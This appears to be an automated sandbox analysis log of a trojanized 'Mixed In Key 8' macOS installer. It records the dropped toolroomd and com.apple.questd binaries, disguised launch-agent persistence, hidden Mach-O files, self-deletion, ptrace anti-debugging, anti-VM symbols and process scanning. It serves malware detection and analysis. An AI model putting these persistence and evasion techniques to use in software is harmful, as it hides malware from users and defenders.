              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/.BC.T_wuooQy -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/MIKAudioJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/.BC.D_rxVqoI -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/MIKAudioJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/.BC.D_kSuooF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/CurrentJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/.BC.D_7qn63h -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/.BC.D_FfVqha -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/CurrentJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/.BC.D_4UJmYO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Icon File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Resources/.BC.T_XuU7QF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Resources/mik.icnsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Icon File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/.BC.T_5jP6rP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/Sparkle.icnsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Icon File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/.BC.T_EZy30A -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/Sparkle.icnsJump to behavior
              Source: /usr/bin/osascript (PID: 763)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 769)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 773)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 777)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 797)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 801)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 806)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 822)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 835)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 839)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 781)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 785)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 789)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 793)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 805)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 813)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 831)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 851)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 855)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 859)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 863)Random device file read: /dev/random
              Source: /usr/bin/osascript (PID: 867)Random device file read: /dev/random
              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
              Source: /usr/bin/osascript (PID: 763)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 769)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 773)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 777)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 797)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 801)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 806)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 822)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 835)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 839)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 781)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 785)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 789)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 793)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 805)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 813)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 831)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 851)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 855)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 859)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 863)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 867)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Binary plist file created: /private/var/db/receipts/com.mixedinkey.installer.plistJump to dropped file
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)XML plist file created: /Library/Receipts/InstallHistory.plistJump to dropped file
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/install_monitor (PID: 749)XML plist file created: /private/var/db/.dat.nosync02ed.qXMjdOJump to dropped file
              Source: /Library/mixednkey/toolroomd (PID: 756)XML plist file created: /Users/ben/Library/LaunchAgents/com.apple.questd.plistJump to dropped file
              Source: /Library/mixednkey/toolroomd (PID: 756)XML plist file created: /Library/LaunchDaemons/com.apple.questd.plistJump to dropped file
              Source: /usr/bin/osascript (PID: 839)Binary plist file created: /private/var/root/Library/Saved Application State/com.apple.osascript.savedState/windows.plistJump to dropped file
              Source: /Library/AppQuest/com.apple.questd (PID: 768)XML plist file created: /private/var/root/Library/LaunchAgents/com.apple.questd.plistJump to dropped file
              Source: /Library/mixednkey/toolroomd (PID: 756)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Library/LaunchDaemons/com.apple.questd.plistJump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/ben/Library/LaunchAgents/com.apple.questd.plistJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /var/root/Library/LaunchAgents/com.apple.questd.plist
              Source: /Library/mixednkey/toolroomd (PID: 756)Launch daemon created File created: /Library/LaunchDaemons/com.apple.questd.plistJump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Launch agent created File created: /Users/ben/Library/LaunchAgents/com.apple.questd.plistJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Launch agent created File created: /var/root/Library/LaunchAgents/com.apple.questd.plist

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Contains functionality related to in-memory code executionShow sources
              Source: extracted submission file .\Utils\patchMach-O symbol: _NSLinkModule
              Source: extracted submission file .\Utils\patchMach-O symbol: _NSUnLinkModule
              Source: extracted submission file .\Utils\patchMach-O symbol: _NSDestroyObjectFileImage
              Source: extracted submission file .\Utils\patchMach-O symbol: _NSCreateObjectFileImageFromMemory
              Creates hidden Mach-O filesShow sources
              Source: /Library/mixednkey/toolroomd (PID: 756)Hidden Mach-O file written: Mach-O 64 bit: /Users/ben/Library/.O6a3uE2h3
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden Mach-O file written: Mach-O 64 bit: /private/var/root/Library/.FNm8T2eKLJump to dropped file
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden Mach-O file written: Mach-O 64 bit: /Users/ben/Library/.O6a3uE2h3Jump to dropped file
              Denies being traced/debugged (via ptrace PT_DENY_ATTACH)Show sources
              Source: /Library/mixednkey/toolroomd (PID: 756)PTRACE system call (PT_DENY_ATTACH): PID 756 denies future traces
              Source: /Library/AppQuest/com.apple.questd (PID: 768)PTRACE system call (PT_DENY_ATTACH): PID 768 denies future traces
              Moves itself during installation or deletes itself after installationShow sources
              Source: /Library/mixednkey/toolroomd (PID: 756)File deleted: /Users/ben/Desktop/Nt7gLoFlYn.dmgJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)File deleted: /Users/ben/Desktop/Nt7gLoFlYn.dmg
              Source: /Library/mixednkey/toolroomd (PID: 756)Launch agent created File created: /Users/ben/Library/LaunchAgents/com.apple.questd.plistJump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Launch agent created File created: /Library/LaunchDaemons/com.apple.questd.plistJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Launch agent created File created: /var/root/Library/LaunchAgents/com.apple.questd.plist

              Malware Analysis System Evasion:

              barindex
              Contains symbols with suspicious names likely related to anti-analysisShow sources
              Source: extracted file from submission .\Utils\patchMach-O symbol: _is_debugging
              Source: extracted file from submission .\Utils\patchMach-O symbol: _is_virtual_mchn
              Source: extracted file from submission .\Utils\patchMach-O symbol: _kill_unwanted
              Source: extracted file from submission .\Utils\patchMach-O symbol: _prevent_trace
              Source: /usr/bin/osascript (PID: 839)Sysctl read request: kern.safeboot (1.66)

              Language, Device and Operating System Detection:

              barindex
              Reads process information of other processesShow sources
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.762 -> queries PID 762
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.761 -> queries PID 761
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.759 -> queries PID 759
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.758 -> queries PID 758
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.757 -> queries PID 757
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.748 -> queries PID 748
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.747 -> queries PID 747
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.746 -> queries PID 746
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.745 -> queries PID 745
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.744 -> queries PID 744
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.743 -> queries PID 743
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.742 -> queries PID 742
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.741 -> queries PID 741
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.737 -> queries PID 737
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.735 -> queries PID 735
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.734 -> queries PID 734
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.733 -> queries PID 733
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.732 -> queries PID 732
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.724 -> queries PID 724
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.723 -> queries PID 723
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.721 -> queries PID 721
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.714 -> queries PID 714
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.711 -> queries PID 711
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.710 -> queries PID 710
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.705 -> queries PID 705
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.704 -> queries PID 704
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.702 -> queries PID 702
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.696 -> queries PID 696
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.695 -> queries PID 695
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.694 -> queries PID 694
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.693 -> queries PID 693
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.691 -> queries PID 691
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.662 -> queries PID 662
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.659 -> queries PID 659
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.657 -> queries PID 657
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.650 -> queries PID 650
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.649 -> queries PID 649
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.602 -> queries PID 602
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.586 -> queries PID 586
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.553 -> queries PID 553
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.542 -> queries PID 542
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.541 -> queries PID 541
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.540 -> queries PID 540
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.538 -> queries PID 538
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.536 -> queries PID 536
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.535 -> queries PID 535
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.534 -> queries PID 534
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.527 -> queries PID 527
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.434 -> queries PID 434
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.432 -> queries PID 432
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.431 -> queries PID 431
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.429 -> queries PID 429
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.428 -> queries PID 428
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.427 -> queries PID 427
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.423 -> queries PID 423
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.422 -> queries PID 422
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.420 -> queries PID 420
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.413 -> queries PID 413
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.412 -> queries PID 412
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.411 -> queries PID 411
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.410 -> queries PID 410
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.409 -> queries PID 409
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.408 -> queries PID 408
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.407 -> queries PID 407
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.406 -> queries PID 406
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.405 -> queries PID 405
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.403 -> queries PID 403
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.402 -> queries PID 402
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.401 -> queries PID 401
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.400 -> queries PID 400
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.397 -> queries PID 397
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.395 -> queries PID 395
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.394 -> queries PID 394
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.393 -> queries PID 393
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.389 -> queries PID 389
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.388 -> queries PID 388
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.387 -> queries PID 387
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.386 -> queries PID 386
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.385 -> queries PID 385
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.384 -> queries PID 384
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.383 -> queries PID 383
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.382 -> queries PID 382
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.381 -> queries PID 381
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.380 -> queries PID 380
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.377 -> queries PID 377
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.376 -> queries PID 376
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.374 -> queries PID 374
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.372 -> queries PID 372
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.368 -> queries PID 368
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.367 -> queries PID 367
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.363 -> queries PID 363
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.362 -> queries PID 362
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.361 -> queries PID 361
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.360 -> queries PID 360
              Source: /Library/mixednkey/toolroomd (PID: 756)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.359 -> queries PID 359
              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)Sysctl read request: hw.ncpu (6.3)Jump to behavior
              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)Sysctl read request: hw.memsize (6.24)Jump to behavior
              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)Sysctl read request: hw.availcpu (6.25)Jump to behavior
              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)Sysctl requested: kern.ostype (1.1)Jump to behavior
